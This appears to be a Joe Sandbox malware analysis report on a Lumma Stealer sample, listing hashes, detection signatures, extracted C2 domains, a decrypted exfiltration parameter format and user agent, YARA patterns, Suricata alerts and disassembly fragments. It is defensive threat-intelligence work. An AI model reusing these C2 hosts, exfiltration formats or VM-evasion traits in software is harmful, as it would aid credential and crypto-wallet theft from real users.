Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3zg6i6Zu1u.exe

Overview

General Information

Sample name:3zg6i6Zu1u.exe
renamed because original name is a hash value
Original sample name:996aa4b544e08689f305d751c60835c7.exe
Analysis ID:1580303
MD5:996aa4b544e08689f305d751c60835c7
SHA1:5792471be8a25d8472a84fa3967f241f776b5cba
SHA256:5f20a76b1d382a5817af09d9c0307fbaeeae34a3e6b714e0eded2bca695bdd94
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3zg6i6Zu1u.exe (PID: 1564 cmdline: "C:\Users\user\Desktop\3zg6i6Zu1u.exe" MD5: 996AA4B544E08689F305D751C60835C7)
    • WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "spellshagey.biz", "effecterectz.xyz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xc30:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:09.648432+010020283713Unknown Traffic192.168.2.84970523.55.153.106443TCP
      2024-12-24T09:05:12.050993+010020283713Unknown Traffic192.168.2.849706172.67.157.254443TCP
      2024-12-24T09:05:13.830658+010020283713Unknown Traffic192.168.2.849707172.67.157.254443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:12.811595+010020546531A Network Trojan was detected192.168.2.849706172.67.157.254443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:12.811595+010020498361A Network Trojan was detected192.168.2.849706172.67.157.254443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:07.471701+010020582101Domain Observed Used for C2 Detected192.168.2.8579411.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:06.250945+010020582141Domain Observed Used for C2 Detected192.168.2.8647081.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:07.012101+010020582161Domain Observed Used for C2 Detected192.168.2.8577691.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:06.702284+010020582181Domain Observed Used for C2 Detected192.168.2.8581921.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:06.482372+010020582201Domain Observed Used for C2 Detected192.168.2.8568851.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:06.013971+010020582221Domain Observed Used for C2 Detected192.168.2.8497131.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:07.795281+010020582261Domain Observed Used for C2 Detected192.168.2.8651461.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:05.853014+010020582851Domain Observed Used for C2 Detected192.168.2.8531001.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:07.237760+010020582361Domain Observed Used for C2 Detected192.168.2.8630661.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T09:05:10.476631+010028586661Domain Observed Used for C2 Detected192.168.2.84970523.55.153.106443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 3zg6i6Zu1u.exeAvira: detected
      Antivirus detection for URL or domain
      Source: https://lev-tolstoi.com/wAvira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/piGIAvira URL Cloud: Label: malware
      Source: spellshagey.bizAvira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/7gAvira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/apiaAvira URL Cloud: Label: malware
      Found malware configuration
      Source: 0.2.3zg6i6Zu1u.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "spellshagey.biz", "effecterectz.xyz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "HpOoIh--2a727a032c4d"}
      Multi AV Scanner detection for submitted file
      Source: 3zg6i6Zu1u.exeVirustotal: Detection: 73%Perma Link
      Source: 3zg6i6Zu1u.exeReversingLabs: Detection: 78%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
      Machine Learning detection for sample
      Source: 3zg6i6Zu1u.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: spellshagey.biz
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--2a727a032c4d

      Compliance

      barindex
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeUnpacked PE file: 0.2.3zg6i6Zu1u.exe.400000.0.unpack
      Source: 3zg6i6Zu1u.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then jmp ecx0_2_0043CA12
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+50h]0_2_00437BC0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2D1F4786h]0_2_0043D010
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ecx, eax0_2_0042A0E0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041C08C
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov edi, edx0_2_00409150
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [esi], al0_2_00409150
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [esi], al0_2_00409150
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebx, eax0_2_00405950
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebp, eax0_2_00405950
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_00414170
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebp+02h]0_2_00429170
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh0_2_00418176
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then lea edi, dword ptr [esi+esi]0_2_0040D120
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, word ptr [ecx]0_2_0041912E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+5D0CB002h]0_2_0041912E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_004349C0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then jmp ecx0_2_0043C9DB
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004189F5
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042B980
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]0_2_0043D980
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]0_2_0043D980
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-47h]0_2_0041D200
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebx, ecx0_2_00423A1C
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+0984A1C9h]0_2_00417A28
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then lea edx, dword ptr [ecx-5D3369E7h]0_2_00409AC1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax+0CC5C7CCh]0_2_00409AC1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042C2CF
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh0_2_00418176
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]0_2_0043DA80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]0_2_0043DA80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then jmp ecx0_2_0043CA9D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ecx, ebx0_2_0043CB51
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_0043EB50
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041BB5A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]0_2_0042DB7F
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]0_2_0043DBF0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]0_2_0043DBF0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004223A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+ecx*8], A269EEEFh0_2_004383A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0040A3AA
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movsx esi, byte ptr [ebp+ecx+00h]0_2_0043D450
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]0_2_0042DB7A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0042B4D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_004144D5
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]0_2_0043DC80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]0_2_0043DC80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ecx, edi0_2_004074A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-1700BF35h]0_2_0041C4A1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_004144A5
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then jmp dword ptr [004446A8h]0_2_00416D51
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]0_2_0043DD00
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]0_2_0043DD00
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+20h]0_2_0042A5CF
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+38h]0_2_0041C661
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0CD1ACF4h]0_2_00438630
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00438630
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D6C2
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D6D9
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00408EF0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ecx, eax0_2_00422F0D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then jmp dword ptr [00444700h]0_2_00416F11
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042AF10
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, word ptr [ebx+ecx]0_2_004227B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2B30990Bh]0_2_004227B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi+02h]0_2_004227B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_004227B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebx, ecx0_2_02493A76
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, word ptr [ebx+ecx]0_2_02492A17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2B30990Bh]0_2_02492A17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi+02h]0_2_02492A17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_02492A17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0248C2F3
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ecx, eax0_2_0249A347
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_02484BCD
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh0_2_024883DD
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebp+02h]0_2_024993D7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0249BBE7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then lea edi, dword ptr [esi+esi]0_2_0247D387
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov eax, dword ptr [esp+0000008Ch]0_2_02486B91
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, word ptr [ecx]0_2_02489395
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+5D0CB002h]0_2_02489395
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov edi, edx0_2_024793B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [esi], al0_2_024793B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [esi], al0_2_024793B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebx, eax0_2_02475BB7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebp, eax0_2_02475BB7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+20h]0_2_0249A836
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+38h]0_2_0248C8C8
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0CD1ACF4h]0_2_024A8897
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_024A8897
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0248D94F
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_02479157
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then jmp dword ptr [00444700h]0_2_02487178
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0249B177
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ecx, eax0_2_0249318B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02492607
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0247A611
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+50h]0_2_024A7E27
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp dword ptr [edi+ecx*8], A269EEEFh0_2_024A863B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]0_2_0249DDE1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov ecx, edi0_2_02477707
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-1700BF35h]0_2_0248C708
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0249B737
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then jmp dword ptr [004446A8h]0_2_02486FB8
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02488C5C
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-47h]0_2_0248D467
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_024A4C27
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+0984A1C9h]0_2_02487C83
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then lea edx, dword ptr [ecx-5D3369E7h]0_2_02479D28
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax+0CC5C7CCh]0_2_02479D28
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0249C536
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0248BDC1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]0_2_0249DDE6
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_024AEDB7

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.8:49713 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:65146 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.8:58192 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.8:64708 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.8:63066 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058285 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz) : 192.168.2.8:53100 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.8:56885 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.8:57769 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.8:57941 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49705 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.157.254:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: diffuculttan.xyz
      Source: Malware configuration extractorURLs: awake-weaves.cyou
      Source: Malware configuration extractorURLs: deafeninggeh.biz
      Source: Malware configuration extractorURLs: wrathful-jammy.cyou
      Source: Malware configuration extractorURLs: spellshagey.biz
      Source: Malware configuration extractorURLs: effecterectz.xyz
      Source: Malware configuration extractorURLs: debonairnukk.xyz
      Source: Malware configuration extractorURLs: sordid-snaked.cyou
      Source: Malware configuration extractorURLs: immureprech.biz
      Performs DNS queries to domains with low reputation
      Source: DNS query: effecterectz.xyz
      Source: DNS query: diffuculttan.xyz
      Source: DNS query: debonairnukk.xyz
      Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
      Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
